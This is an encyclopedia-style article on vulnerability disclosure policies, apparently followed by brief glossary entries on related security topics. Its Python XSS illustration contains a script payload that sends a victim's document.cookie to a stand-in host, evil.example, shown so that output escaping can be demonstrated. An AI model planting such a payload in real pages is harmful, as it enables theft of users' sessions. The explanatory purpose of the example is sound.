In the field of computer security, independent researchers often discover flaws in software that can be abused to cause unintended behaviour; these flaws are called vulnerabilities. The process by which the analysis of these vulnerabilities is shared with third parties is the subject of much debate, and is referred to as the researcher's disclosure policy. Full disclosure is the practice of publishing analysis of software vulnerabilities as early as possible, making the data accessible to everyone without restriction. The primary purpose of widely disseminating information about vulnerabilities is so that potential victims are as knowledgeable as those who attack them. [1]
In his 2007 essay on the topic, Bruce Schneier stated "Full disclosure – the practice of making the details of security vulnerabilities public – is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure." [2] Leonard Rose, co-creator of an electronic mailing list that has superseded Bugtraq to become the de facto forum for disseminating advisories, explains "We don't believe in security by obscurity, and as far as we know, full disclosure is the only way to ensure that everyone, not just the insiders, have access to the information we need." [3]
The controversy around the public disclosure of sensitive information is not new. The issue of full disclosure was first raised in the context of locksmithing, in a 19th-century controversy regarding whether weaknesses in lock systems should be kept secret in the locksmithing community, or revealed to the public. [4] Today, there are three major disclosure policies under which most others can be categorized: [5] Non Disclosure, Coordinated Disclosure, and Full Disclosure.
The major stakeholders in vulnerability research have their disclosure policies shaped by various motivations; it is not uncommon to observe campaigning, marketing, or lobbying for their preferred policy to be adopted, and chastising of those who dissent. Many prominent security researchers favor full disclosure, whereas most vendors prefer coordinated disclosure. Non disclosure is generally favored by commercial exploit vendors and blackhat hackers. [6]
Coordinated vulnerability disclosure is a policy under which researchers agree to report vulnerabilities to a coordinating authority, which then reports them to the vendor, tracks fixes and mitigations, and coordinates the disclosure of information with stakeholders, including the public. [7] [8] In some cases the coordinating authority is the vendor. The premise of coordinated disclosure is typically that nobody should be informed about a vulnerability until the software vendor says it is time. [9] [10] While there are often exceptions or variations of this policy, distribution must initially be limited, and vendors are given privileged access to nonpublic research. [11]
The original name for this approach was "responsible disclosure", based on Microsoft Security Manager Scott Culp's essay "It's Time to End Information Anarchy" [12] (referring to full disclosure). Microsoft later called for the term to be phased out in favor of "Coordinated Vulnerability Disclosure" (CVD). [13] [14]
Although the reasoning varies, many practitioners argue that end-users cannot benefit from access to vulnerability information without guidance or patches from the vendor, so the risk of sharing research with malicious actors is too great for too little benefit. As Microsoft explains, "[Coordinated disclosure] serves everyone's best interests by ensuring that customers receive comprehensive, high-quality updates for security vulnerabilities but are not exposed to malicious attacks while the update is being developed." [14]
To prevent vendors from indefinitely delaying disclosure, a common practice in the security industry, pioneered by Google, [15] is to publish all the details of vulnerabilities after a deadline, usually 90 or 120 days, [16] reduced to 7 days if the vulnerability is under active exploitation. [17]
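A minimal sketch of such a deadline policy in Python, assuming the 90/120-day and 7-day figures cited above; the function name and defaults are illustrative, not any vendor's actual tooling:

```python
from datetime import date, timedelta

def disclosure_deadline(reported: date, window_days: int = 90,
                        actively_exploited: bool = False) -> date:
    """Date on which details would be published under a deadline-based
    policy: a fixed window (commonly 90 or 120 days), shortened to 7 days
    when the flaw is already being exploited in the wild."""
    window = 7 if actively_exploited else window_days
    return reported + timedelta(days=window)

# A bug reported on 1 March 2024 with no known exploitation:
print(disclosure_deadline(date(2024, 3, 1)))                           # 2024-05-30
# The same bug, but already under active exploitation:
print(disclosure_deadline(date(2024, 3, 1), actively_exploited=True))  # 2024-03-08
```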
Full disclosure is the policy of publishing information on vulnerabilities as early as possible, making the information accessible to the general public without restriction. In general, proponents of full disclosure believe that the benefits of freely available vulnerability research outweigh the risks, whereas opponents prefer to limit the distribution.
The free availability of vulnerability information allows users and administrators to understand and react to vulnerabilities in their systems, and allows customers to pressure vendors to fix vulnerabilities that vendors may otherwise feel no incentive to solve. There are some fundamental problems with coordinated disclosure that full disclosure can resolve.
Discovery of a specific flaw or vulnerability is not a mutually exclusive event; multiple researchers with differing motivations can and do discover the same flaws independently.
There is no standard way to make vulnerability information available to the public; researchers often use mailing lists dedicated to the topic, academic papers, or industry conferences.
Non disclosure is the policy that vulnerability information should not be shared, or should only be shared under a non-disclosure agreement (whether contractual or informal).
Common proponents of non-disclosure include commercial exploit vendors, researchers who intend to exploit the flaws they find, [5] and proponents of security through obscurity.
In 2009, Charlie Miller, Dino Dai Zovi and Alexander Sotirov announced the "No More Free Bugs" campaign at the CanSecWest conference, arguing that companies profit from and take advantage of security researchers by not paying them for disclosing bugs. [18] The announcement made the news and opened a broader debate about the problem and its associated incentives. [19] [20]
Researchers in favor of coordinated disclosure believe that users cannot make use of advanced knowledge of vulnerabilities without guidance from the vendor, and that the majority is best served by limiting distribution of vulnerability information. Advocates argue that low-skilled attackers can use this information to perform sophisticated attacks that would otherwise be beyond their ability, and the potential benefit does not outweigh the potential harm caused by malevolent actors. Only when the vendor has prepared guidance that even the most unsophisticated users can digest should the information be made public.
This argument presupposes that vulnerability discovery is a mutually exclusive event, that is, that only one person can discover a given vulnerability. In practice, there are many examples of vulnerabilities being discovered simultaneously, often being exploited in secrecy before discovery by other researchers. [21] Full disclosure advocates also regard the assumption that users cannot make use of vulnerability information as contempt for the intelligence of end users; while some users genuinely cannot benefit from the information, those who are concerned with the security of their networks are in a position to hire an expert to assist them, just as they would hire a mechanic to help with a car.
Non disclosure is typically used when a researcher intends to use knowledge of a vulnerability to attack computer systems operated by their enemies, or to trade knowledge of a vulnerability for profit to a third party, who will typically use it to attack their own enemies.
Researchers practicing non disclosure are generally not concerned with improving security or protecting networks. However, some proponents argue that they simply do not want to assist vendors, and claim no intent to harm others.
While full and coordinated disclosure advocates declare similar goals and motivations, simply disagreeing on how best to achieve them, non disclosure is entirely incompatible with both.
In the context of an operating system, a device driver is a computer program that operates or controls a particular type of device that is attached to a computer or automaton. A driver provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used.
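As a rough illustration of that separation, here is a minimal sketch in Python; the BlockDevice and RamDiskDriver names are hypothetical, chosen only to show the idea of an interface that hides hardware details from callers:

```python
from abc import ABC, abstractmethod

class BlockDevice(ABC):
    """Hypothetical driver interface: callers use read_block/write_block
    and never touch the underlying hardware directly."""

    @abstractmethod
    def read_block(self, lba: int) -> bytes: ...

    @abstractmethod
    def write_block(self, lba: int, data: bytes) -> None: ...

class RamDiskDriver(BlockDevice):
    """Toy in-memory 'device' standing in for real hardware."""
    BLOCK_SIZE = 512

    def __init__(self, blocks: int = 16):
        self._storage = bytearray(blocks * self.BLOCK_SIZE)

    def read_block(self, lba: int) -> bytes:
        start = lba * self.BLOCK_SIZE
        return bytes(self._storage[start:start + self.BLOCK_SIZE])

    def write_block(self, lba: int, data: bytes) -> None:
        start = lba * self.BLOCK_SIZE
        self._storage[start:start + len(data)] = data

# A filesystem or application only sees the BlockDevice interface.
disk: BlockDevice = RamDiskDriver()
disk.write_block(0, b"hello")
print(disk.read_block(0)[:5])  # b'hello'
```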
An exploit is a method or piece of code that takes advantage of vulnerabilities in software, applications, networks, operating systems, or hardware, typically for malicious purposes. The term "exploit" derives from the English verb "to exploit," meaning "to use something to one's own advantage." Exploits are designed to identify flaws, bypass security measures, gain unauthorized access to systems, take control of systems, install malware, or steal sensitive data. While an exploit by itself may not be malware, it serves as a vehicle for delivering malicious software by breaching security controls.
Defensive programming is a form of defensive design intended to develop programs that are capable of detecting potential security abnormalities and making predetermined responses. It ensures the continuing function of a piece of software under unforeseen circumstances. Defensive programming practices are often used where high availability, safety, or security is needed.
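A minimal sketch of the idea in Python, assuming a hypothetical routine that parses an untrusted length field; the names and limits are illustrative:

```python
MAX_MESSAGE_LENGTH = 4096  # predetermined upper bound, assumed for illustration

def read_message(length_field: str, payload: bytes) -> bytes:
    """Defensively validate an untrusted length field before using it.
    Abnormal input triggers a predetermined response (raising ValueError)
    rather than silently corrupting state."""
    try:
        length = int(length_field)
    except ValueError:
        raise ValueError("length field is not a number")
    if not 0 <= length <= MAX_MESSAGE_LENGTH:
        raise ValueError("length outside the allowed range")
    if length > len(payload):
        raise ValueError("declared length exceeds available data")
    return payload[:length]

print(read_message("5", b"hello world"))  # b'hello'
```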
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. During the second half of 2007, XSSed documented 11,253 site-specific cross-site scripting vulnerabilities, compared to 2,134 "traditional" vulnerabilities documented by Symantec. The effects of XSS range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
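A small Python illustration of the underlying problem and the usual fix, output escaping; the attacker string and page template are made up for the example:

```python
import html

untrusted = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Vulnerable: the attacker-controlled string is inserted into the page verbatim,
# so a browser would execute the injected script in the victim's session.
vulnerable_page = f"<p>Hello {untrusted}</p>"

# Safer: escaping converts the markup characters to HTML entities, so the
# payload is displayed as text rather than executed.
safe_page = f"<p>Hello {html.escape(untrusted)}</p>"

print(vulnerable_page)
print(safe_page)
```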
A patch is data that is intended to be used to modify an existing software resource such as a program or a file, often to fix bugs and security vulnerabilities. A patch may be created to improve functionality, usability, or performance. A patch is typically provided by a vendor for updating the software that they provide. A patch may be created manually, but commonly it is created via a tool that compares two versions of the resource and generates data that can be used to transform one to the other.
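The "compare two versions and generate data that transforms one into the other" step can be sketched with Python's standard difflib module; the file contents below are invented for the example:

```python
import difflib

old_version = ["def greet(name):\n", "    print('hello ' + name)\n"]
new_version = ["def greet(name):\n", "    # sanitized output\n", "    print('hello', name)\n"]

# The generated unified diff is the "patch": data describing how to turn
# the old version of the resource into the new one.
patch = difflib.unified_diff(old_version, new_version,
                             fromfile="greet.py (old)", tofile="greet.py (new)")
print("".join(patch))
```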
A grey hat is a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but usually does not have the malicious intent typical of a black hat hacker.
Vulnerabilities are flaws in a computer system that weaken the overall security of the system.
The Common Vulnerabilities and Exposures (CVE) system provides a reference method for publicly known information-security vulnerabilities and exposures. The United States' National Cybersecurity FFRDC, operated by The MITRE Corporation, maintains the system, with funding from the US National Cyber Security Division of the US Department of Homeland Security. The system was officially launched for the public in September 1999.
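As a small illustration of the reference scheme, here is a sketch that checks whether a string is shaped like a CVE identifier (CVE-&lt;year&gt;-&lt;sequence number&gt;, with the sequence number at least four digits):

```python
import re

# CVE identifiers have the form CVE-<year>-<sequence number>, where the
# sequence number is at least four digits (e.g. CVE-2014-0160).
CVE_PATTERN = re.compile(r"^CVE-\d{4}-\d{4,}$")

def is_cve_id(candidate: str) -> bool:
    return bool(CVE_PATTERN.match(candidate))

print(is_cve_id("CVE-2014-0160"))  # True  (Heartbleed)
print(is_cve_id("CVE-19-1"))       # False
```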
The CERT Coordination Center (CERT/CC) is the coordination center of the computer emergency response team (CERT) for the Software Engineering Institute (SEI), a non-profit United States federally funded research and development center. The CERT/CC researches software bugs that impact software and internet security, publishes research and information on its findings, and works with businesses and the government to improve the security of software and the internet as a whole.
In computer security, coordinated vulnerability disclosure is a vulnerability disclosure model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to patch or remedy the vulnerability or issue. This coordination distinguishes the CVD model from the "full disclosure" model.
A zero-day is a vulnerability in software or hardware that is typically unknown to the vendor and for which no patch or other fix is available. The vendor has zero days to prepare a patch as the vulnerability has already been described or exploited.
Malwarebytes is anti-malware software for Microsoft Windows, macOS, ChromeOS, Android, and iOS that finds and removes malware. Made by Malwarebytes Corporation, it was first released in January 2006. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash-memory scanner.
A bug bounty program is a deal offered by many websites, organizations, and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities.
Project Zero is a team of security analysts employed by Google tasked with finding zero-day vulnerabilities. It was announced on 15 July 2014.
JASBUG is a security bug disclosed in February 2015 and affecting core components of the Microsoft Windows operating system. The vulnerability dated back to 2000 and affected all supported editions of Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1.
Katie Moussouris is an American computer security researcher, entrepreneur, and pioneer in vulnerability disclosure, and is best known for her ongoing work advocating responsible security research. Previously a member of @stake, she created the bug bounty program at Microsoft and was directly involved in creating the U.S. Department of Defense's first bug bounty program for hackers. She previously served as Chief Policy Officer at HackerOne, a vulnerability disclosure company based in San Francisco, California, and currently is the founder and CEO of Luta Security.
Meltdown is one of the two original transient execution CPU vulnerabilities. Meltdown affects Intel x86 microprocessors, IBM Power microprocessors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so.
The Microarchitectural Data Sampling (MDS) vulnerabilities are a set of weaknesses in Intel x86 microprocessors that use hyper-threading, and leak data across protection boundaries that are architecturally supposed to be secure. The attacks exploiting the vulnerabilities have been labeled Fallout, RIDL, ZombieLoad, and ZombieLoad 2.
BlueKeep is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.
Zero Day Initiative (ZDI) is an international software vulnerability initiative that was started in 2005 by TippingPoint, a division of 3Com. The program was acquired by Trend Micro as a part of the HP TippingPoint acquisition in 2015.